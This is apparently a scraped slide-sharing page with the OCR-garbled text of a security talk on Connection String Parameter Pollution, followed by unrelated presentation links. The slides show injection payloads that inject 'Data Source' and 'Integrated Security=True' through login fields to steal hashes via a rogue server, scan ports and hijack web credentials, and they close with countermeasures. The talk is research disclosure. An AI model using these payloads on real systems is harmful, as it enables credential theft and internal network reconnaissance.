p chema alonso chema alonso inform tica 64 inform tica 64
play

p Chema Alonso Chema Alonso Informtica 64 Informtica 64 Connection - PowerPoint PPT Presentation

Jun 15, 2023 •130 likes •520 views

p Chema Alonso Chema Alonso Informtica 64 Informtica 64 Connection Strings Connection Strings Define the way an application connects to Define the way an application connects to data repository There are connection strings for:

  1. p Chema Alonso Chema Alonso Informática 64 Informática 64

  2. Connection Strings Connection Strings • Define the way an application connects to Define the way an application connects to data repository • There are connection strings for: • There are connection strings for: – Relational Databases (MSSQL, Oracle, MySQL,…) – LDAP Directories LDAP Di i – Files – Etc…

  3. Databases Connection Strings Databases Connection Strings Data Source = myServerAddress; Data Source = myServerAddress; Initial Catalog = myDataBase; Initial Catalog myDataBase; User Id = myUsername; Password = myPassword;

  4. Google Hacking Google Hacking

  5. Google Hacking Google Hacking

  6. UDL (Universal Data Links) Files UDL (Universal Data Links) Files

  7. Credentials Credentials Operating System Accounts Operating System Accounts Database Credentials Database Credentials Data Source = Data Source = myServerAddress; myServerAddress; Initial Catalog = myDataBase; Initial Catalog = myDataBase; User Id = myUsername; User Id = myUsername; Password = myPassword; Password = myPassword; Integrated Security = Integrated Security = No; SSPI/True/Yes; SSPI/True/Yes;

  8. Users autheticated by Web App Web application manages the login process 1. ‐ Web applicaton connects using its Syslogins Connection string credentials to the credentials to the database. 2. ‐ Asks user login information. i f ti Select id from users Custom 3. ‐ Checks login users table information about info stored in custom users table. Database Engine App running on Web Server

  9. Users autheticated by Database Database engine manages the login process 1. ‐ Web application asks for credentials. 2. ‐ A connection string 2 i i is composed with the credentials to connect Connection string Syslogins to the database. 3. ‐ Roles and permits are limited by the user used in the connection sed in the connection string Database Engine App running on Web Server

  10. Connection String Attacks Connection String Attacks • It´s possible to inject parameters into connection It s possible to inject parameters into connection strings using semi colons as separators Data Source = myServerAddress; I iti l C t l Initial Catalog = myDataBase; D t B Integrated Security = NO; User Id = myUsername; Password = myPassword; Encryption = Off;

  11. ConnectionStringBuiler ConnectionStringBuiler • Available in .NET Framework 2.0 • Build secure connection strings using parameters • It´s not possible to inject into the connection string

  12. Are people aware of this? Are people aware of this?

  13. Connection String Parameter Pollution Connection String Parameter Pollution • The goal is to inject parameters in the connection e goa s to ject pa a ete s t e co ect o string, whether they exist or not • Had duplicated a parameter, the last value wins • This behavior allows attackers to re ‐ write completly the connection string, therefore to manipulate the way the appliation will work and how should be the it authenticated

  14. Pollutionable Behavior Pollutionable Behavior Param1=Value A Param1=Value A Param2=Value B Param2=Value B Param1=Value C Param1=Value C Param2=Value D Param2=Value D DBConnection Object Param1 Param1 Param2

  15. What can be done with CSPP? Rewrite a parameter Data Source=DB1 Data Source=DB1 UID=sa UID=sa password=Pwnd! password=Pwnd! Data Source=DB2 Data Source=DB2 DBConnection Object DataSource DataSource UID password

  16. Scanning the DMZ Scanning the DMZ Finnacial Test Forgotten Development Database 1 Database Database Database Data Web app Source Production Production Internet I t t FW vulnerable Database to CSPP

  17. Port Scanning a Server Port Scanning a Server DataSource DataSource DB1,80 DB1,21 DB1,25 Web app Internet Production vulnerable Database FW to CSPP to CSPP DB1 1445 DB1,1445 Server

  18. What can be done with CSPP? Add a parameter dd Data Source=DB1 Data Source=DB1 UID=sa UID=sa password=Pwnd! password=Pwnd! Integrated Security=True Integrated Security=True DBConnection Object DataSource UID password password

  19. CSPP Attack 1: Hash stealing CSPP Attack 1: Hash stealing 1 ‐ Run a Rogue Server on an accessibl IP address: 1. Run a Rogue Server on an accessibl IP address: Rogue_Server 2 Activate a sniffer to catch the login process 2. ‐ Activate a sniffer to catch the login process Cain/Wireshark 3. ‐ Duplicate Data Source parameter Data_Source=Rogue_Server 4. ‐ Force Windows Integrated Authentication Integrated Security=true g y

  20. CSPP Attack 1: Robo de Hash CSPP Attack 1: Robo de Hash Data source = SQL2005; initial catalog = db1; Data source SQL2005; initial catalog db1; Integrated Security=no; user id=+’ User_Value ’+; Password=+’ Password Value ’+; Password=+ Password_Value +; Data source = SQL2005; initial catalog = db1; D t SQL2005 i iti l t l db1 Integrated Security=no; user id= ;Data S Source=Rogue_Server ; R S Password= ;Integrated Security=True ;

  21. CSSP 1:ASP.NET Enterprise Manager CSSP 1:ASP.NET Enterprise Manager

  22. CSPP Attack 2: Port Scanning CSPP Attack 2: Port Scanning 1 ‐ Duplicate the Data Source parameter setting 1. Duplicate the Data Source parameter setting on it the Target server and target port to be scanned scanned. Data_Source=Target_Server,target_Port 2 Check the error messages: 2. ‐ Check the error messages: ‐ No TCP Connection ‐ > Port is opened ‐ No SQL Server ‐ > Port is closed ‐ SQL Server ‐ > Invalid Password

  23. CSPP Attack 2: Port Scanning CSPP Attack 2: Port Scanning Data source = SQL2005; initial catalog = db1; Data source SQL2005; initial catalog db1; Integrated Security=no; user id=+’ User_Value ’+; Password=+’ Password Value ’+; Password=+ Password_Value +; Data source = SQL2005; initial catalog = db1; D t SQL2005 i iti l t l db1 Integrated Security=no; user id= ;Data S Source=Target_Server, Target_Port ; T t S T t P t Password= ;Integrated Security=True ;

  24. CSPP 2: myLittleAdmin CSPP 2: myLittleAdmin Port is Opened Port is Opened

  25. CSPP 2: myLittleAdmin CSPP 2: myLittleAdmin Port is Closed Port is Closed

  26. CSPP Attack 3: Hijacking Web Credentials CSPP Attack 3: Hijacking Web Credentials 1 ‐ Duplicate Data Source parameter to the 1. Duplicate Data Source parameter to the target SQL Server Data Source=Target Server Data_Source=Target_Server 2. ‐ Force Windows Authentication Integrated Security=true 3. ‐ Application pool in which the web app is pp p pp running on will send its credentials in order to log in to the database engine. g g

  27. CSPP Attack 3: Hijacking Web Credentials CSPP Attack 3: Hijacking Web Credentials Data source = SQL2005; initial catalog = db1; Data source SQL2005; initial catalog db1; Integrated Security=no; user id=+’ User_Value ’+; Password=+’ Password Value ’+; Password=+ Password_Value +; Data source = SQL2005; initial catalog = db1; D t SQL2005 i iti l t l db1 Integrated Security=no; user id= ;Data S Source=Target_Server ; T t S Password= ;Integrated Security=true ;

  28. CSPP Attack 3: Web Data Administrator CSPP Attack 3: Web Data Administrator

  29. CSPP Attack 3: myLittleAdmin/myLittleBackup l d / l k

  30. CSPP Attack 3: ASP.NET Enterprise Manager CSPP Attack 3: ASP.NET Enterprise Manager

  31. Other Databases Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application, although • Port Scanning • Connect to internal/testing/for developing Databases • Oracle supports integrated authority running on Windows and UNIX/Linux servers d UNIX/Li – It´s possible to perform all described attacks • Hash stealing • Port Scanning P t S i • Hijacking Web credentials – Also it´s possible to elevate a connection to sysdba in order to shutdown/startup an instance shutdown/startup an instance

  33. myLittleAdmin/myLittleBackup myLittleAdmin/myLittleBackup myLittleTools released a secury advisory and a patch about this

  34. ASP.NET Enterprise Manager ASP.NET Enterprise Manager • ASP.NET Enterprise Manager is “abandoned”, but it´s been used in a lot of web Control Panels. • Fix the code yourself Fix the code yourself

  35. ASP.NET Enterprise Manager ASP.NET Enterprise Manager • ASP.NET Enterprise Manager is “abandoned”, but it´s been used in a lot of web Control Panels been used in a lot of web Control Panels. • Fix the code yourself h lf

  36. ASP.NET Web Data Admistrator ASP.NET Web Data Admistrator ASP Web Data Administrator is secure in CodePlex web site, but not in Microsoft web site where is been published an unsecure old version

  37. Countermeasures Countermeasures • Harden your firewall a de you e a – Outbound connections • Harden your internal accounts y – Web application – Web server – Database Engine • Use ConnectionStringBuilder • Filter the ;)

  38. Questions? Questions? Contacto Chema Alonso chema@informatica64.com http://www.informatica64.com http://elladodelmal.blogspot.com Palako palakko@lateatral.com Authors Chema Alonso Manuel Fernández “The Sur” Alejandro Martín Bailón Antonio Guzmán

Recommend

Chema Alonso, Enrique Rando Metadata: Information stored to give information about the

Chema Alonso, Enrique Rando Metadata: Information stored to give information about the

Chema Alonso, Enrique Rando Metadata: Information stored to give information about the document. For example: Creator, Organization, etc.. Hidden information: Information internally stored by programs and not editable. For

964 views • 57 slides
C OORDINATING GIS S CHEMA W ORKING WITH M ULTIPLE J URISDICTIONS Andrew Newsome, Jonathan Heiss,

C OORDINATING GIS S CHEMA W ORKING WITH M ULTIPLE J URISDICTIONS Andrew Newsome, Jonathan Heiss,

C OORDINATING GIS S CHEMA W ORKING WITH M ULTIPLE J URISDICTIONS Andrew Newsome, Jonathan Heiss, Alan Cunningham September 2, 2015 DCMP F ACTS (D ULLES C ORRIDOR M ETRORAIL P ROJECT ) Seamless integration with current 106-mile Metro system.

803 views • 42 slides
Workload Characterization of 3D Games Jordi Roca, Victor Moya, Carlos Gonzlez, Chema Solis,

Workload Characterization of 3D Games Jordi Roca, Victor Moya, Carlos Gonzlez, Chema Solis,

Workload Characterization of 3D Games Jordi Roca, Victor Moya, Carlos Gonzlez, Chema Solis, Agustn Fernandez and Roger Espasa (Intel DEG Barcelona) Computer Architecture Department 1 Outline Introduction Game selection &

460 views • 27 slides
PO POLI LITI TICA CAL L LAN LANDS DSCA CAPE PE Washingtons political dynamic is

PO POLI LITI TICA CAL L LAN LANDS DSCA CAPE PE Washingtons political dynamic is

PO POLI LITI TICA CAL L LAN LANDS DSCA CAPE PE Washingtons political dynamic is fractured House actions are tempered by conservative pressure and tight Democratic majority in the Senate and President Obama Demonstrating business

686 views • 37 slides
Inteligncia Artificial: Cincia, Negcios e tica Luis Lamb, Ph.D. Ttulo do captulo

Inteligncia Artificial: Cincia, Negcios e tica Luis Lamb, Ph.D. Ttulo do captulo

Inteligncia Artificial: Cincia, Negcios e tica Luis Lamb, Ph.D. Ttulo do captulo Novembro de 2018 Pr-Reitor de Pesquisa - UFRGS Sumrio Um pouco de Histria I.A., computao e impactos sociais Business: Reality

621 views • 60 slides
BI BIG PI PICTURE CTURE IN N STATIS TISTI TICA CAL FRAME AME A DATA VI VISUALIZA

BI BIG PI PICTURE CTURE IN N STATIS TISTI TICA CAL FRAME AME A DATA VI VISUALIZA

BI BIG PI PICTURE CTURE IN N STATIS TISTI TICA CAL FRAME AME A DATA VI VISUALIZA ALIZATI TION ON PR PROJECT OJECT OF OF ELECTRONIC RESOURCES PRICE CHANGES IN ACADEM ADEMIC IC LIBR BRAR ARIES IES Chen eng g Chen eng,

576 views • 28 slides
de la Pobreza Sabina Alkire (OPHI) Motivacin tica ca Las vidas humanas son maltratadas y

de la Pobreza Sabina Alkire (OPHI) Motivacin tica ca Las vidas humanas son maltratadas y

La Medicin Multidimensional de la Pobreza Sabina Alkire (OPHI) Motivacin tica ca Las vidas humanas son maltratadas y disminudas en una gran diversidad de formas . Amartya Sen Visin in de conjun junto to Mientras que

1.33k views • 106 slides
Tribes Treaties and Time Presented to 15 th Annual ILPC/TICA Indigenous Law Conference Heather

Tribes Treaties and Time Presented to 15 th Annual ILPC/TICA Indigenous Law Conference Heather

Tribes Treaties and Time Presented to 15 th Annual ILPC/TICA Indigenous Law Conference Heather Whiteman Runs Him, Senior Staff Attorney Native American Rights Fund November 15, 2018 Herreras case Clayvin Herrera, a Crow tribal citizen, and

517 views • 14 slides
Global eStandards and Web Architectures for eGovernment projects Jos M. Alonso,

Global eStandards and Web Architectures for eGovernment projects Jos M. Alonso,

Global eStandards and Web Architectures for eGovernment projects Jos M. Alonso, <josema@w3.org> eGovernment and W3C Jos M. Alonso CTIC Fellow - W3C eGovernment Lead Technology and Society Domain 28 May 2007 These slides:

526 views • 21 slides
Inform 7 The Hall is a room. Inform 7 Logic based programming Similar to Prolog

Inform 7 The Hall is a room. Inform 7 Logic based programming Similar to Prolog

C152 Programming Language Paradigms Prof. Tom Austin, Fall 2014 Inform 7 The Hall is a room. Inform 7 Logic based programming Similar to Prolog Inform 6 (and earlier) were procedural languages Inform 7 is a domain specific

550 views • 23 slides
Optimal Transportation and Equilibria on Wireless Networks Alonso SILVA alonso.silva@inria.fr

Optimal Transportation and Equilibria on Wireless Networks Alonso SILVA alonso.silva@inria.fr

INRIA Optimal Transportation and Equilibria on Wireless Networks Alonso SILVA alonso.silva@inria.fr (joint work with H. Tembine) POPEYE meeting - April 09, 2009 Optimal Transportation 1 Mass transportation The theory of mass transportation

463 views • 17 slides
Ready for 100% Renewable Energy Allyson Samuell, Tica Douglas, Allen Armstrong Ready for 100% -

Ready for 100% Renewable Energy Allyson Samuell, Tica Douglas, Allen Armstrong Ready for 100% -

Ready for 100% Renewable Energy Allyson Samuell, Tica Douglas, Allen Armstrong Ready for 100% - Vision & Values VISION We envision a world powered by clean, renewable energy, like solar and wind, where all electricity, buildings and

431 views • 16 slides
Snapshot Isolation Christian Plattner, Gustavo Alonso Exercises for Verteilte Systeme WS05/06

Snapshot Isolation Christian Plattner, Gustavo Alonso Exercises for Verteilte Systeme WS05/06

Snapshot Isolation Christian Plattner, Gustavo Alonso Exercises for Verteilte Systeme WS05/06 Swiss Federal Institute of Technology (ETH), Zrich {plattner,alonso}@inf.ethz.ch 27.01.2006 Today Reminder: Traditional Concurrency Control in

551 views • 40 slides
Outline: Outline: -Motivations of GAPI Lib -Why GAs? -Structure of GAs - GAPI Lib architecture

Outline: Outline: -Motivations of GAPI Lib -Why GAs? -Structure of GAs - GAPI Lib architecture

An Approach Approach to to the the Calibration Calibration of of An Modelica Models Models Modelica M.A M.A. Rubio, A. Urquia, S. Dormido . Rubio, A. Urquia, S. Dormido EOOLT 2007 EOOLT 2007 Departamento de Inform tica y Autom

354 views • 10 slides
Improving Government through Better Use of the Web Jos M. Alonso <josema@w3.org>

Improving Government through Better Use of the Web Jos M. Alonso <josema@w3.org>

Improving Government through Better Use of the Web Jos M. Alonso <josema@w3.org> eGovernment Lead, W3C/CTIC Disclaimers Formal work has just started We dont have the solutions! trying to identify the challenges Not yet the view of

595 views • 37 slides
Data Management Systems Fall Semester 2020 Gustavo Alonso Institute of Computing Platforms

Data Management Systems Fall Semester 2020 Gustavo Alonso Institute of Computing Platforms

Data Management Systems Fall Semester 2020 Gustavo Alonso Institute of Computing Platforms Administrative Introduction Department of Computer Science ETH Zrich Administrative Introduction 1 About us Prof. Gustavo Alonso Systems

490 views • 17 slides
Government Data on the Web Jos M. Alonso eGovernment Lead W3C/CTIC eGovernment at W3C

Government Data on the Web Jos M. Alonso eGovernment Lead W3C/CTIC eGovernment at W3C

Government Data on the Web Jos M. Alonso eGovernment Lead W3C/CTIC eGovernment at W3C Public Open Interest Group Collective effort Governments, Industry, Citizens, Civil Societies, other International Bodies Identification and

695 views • 33 slides
Parallel Numerical Algorithms for Heterogeneous Parallel Computers Antonio M. Vidal Maci a

Parallel Numerical Algorithms for Heterogeneous Parallel Computers Antonio M. Vidal Maci a

Parallel Numerical Algorithms for Heterogeneous Parallel Computers Antonio M. Vidal Maci a (in collaboration with Pedro Alonso, Miguel O. Bernabeu, Victor M. Garc a) Departamento de Sistemas Inform aticos y Computaci on

402 views • 23 slides
INFORM DEBTOR International debt management system www.informdebtor.com Problem INFORM DEBTOR

INFORM DEBTOR International debt management system www.informdebtor.com Problem INFORM DEBTOR

INFORM DEBTOR International debt management system www.informdebtor.com Problem INFORM DEBTOR Complicated, time and money consuming international debt collection process Challenge Language barrier Tough negotiations to fjnd trusted partner

155 views • 13 slides
Elio Shijaku, Mar/n Larraza-Kintana, Ainhoa Urtasun-Alonso

Elio Shijaku, Mar/n Larraza-Kintana, Ainhoa Urtasun-Alonso

Elio Shijaku, Mar/n Larraza-Kintana, Ainhoa Urtasun-Alonso Introduc/on Mo/va/on, contribu/on, research ques/ons Theore/cal framework Longitudinal network

602 views • 14 slides
LTE as the Future Railway Communication System: Benefits and Challenges Jos I. Alonso

LTE as the Future Railway Communication System: Benefits and Challenges Jos I. Alonso

LTE as the Future Railway Communication System: Benefits and Challenges Jos I. Alonso Technical University of Madrid Date: November 25, 2013 OUTLINE Introduction Railway Services & Applications. GSM-R Migration Process.

229 views • 21 slides
MRI Portable Devices for Medical Environments. Javier Alonso Valdesueiro. Ph.D. Science and

MRI Portable Devices for Medical Environments. Javier Alonso Valdesueiro. Ph.D. Science and

MRI Portable Devices for Medical Environments. Javier Alonso Valdesueiro. Ph.D. Science and Technology Faculty, Electricity and Electronics UPV/EHU. lfpMRI 2 So what for today? RF-MAFS project. Or how we deal with nuclear interactions,

512 views • 28 slides
The Curvature of Higgs Field Space Rodrigo Alonso In collaboration with E.E. Jenkins & A.V.

The Curvature of Higgs Field Space Rodrigo Alonso In collaboration with E.E. Jenkins & A.V.

The Curvature of Higgs Field Space Rodrigo Alonso In collaboration with E.E. Jenkins & A.V. Manohar HEFT 2015 - Chicago The Nature of the New Scalar Composite? Elemental? Mass Stabilization? Effective Field Theories helps us stay

276 views • 25 slides
Data Processing in in th the Era of f Specialization Gustavo Alonso Systems Group Department

Data Processing in in th the Era of f Specialization Gustavo Alonso Systems Group Department

Data Processing in in th the Era of f Specialization Gustavo Alonso Systems Group Department of Computer Science ETH Zurich, Switzerland A Renaissance for database systems research Martin has pioneered and continues contributing many

136 views • 10 slides

More recommend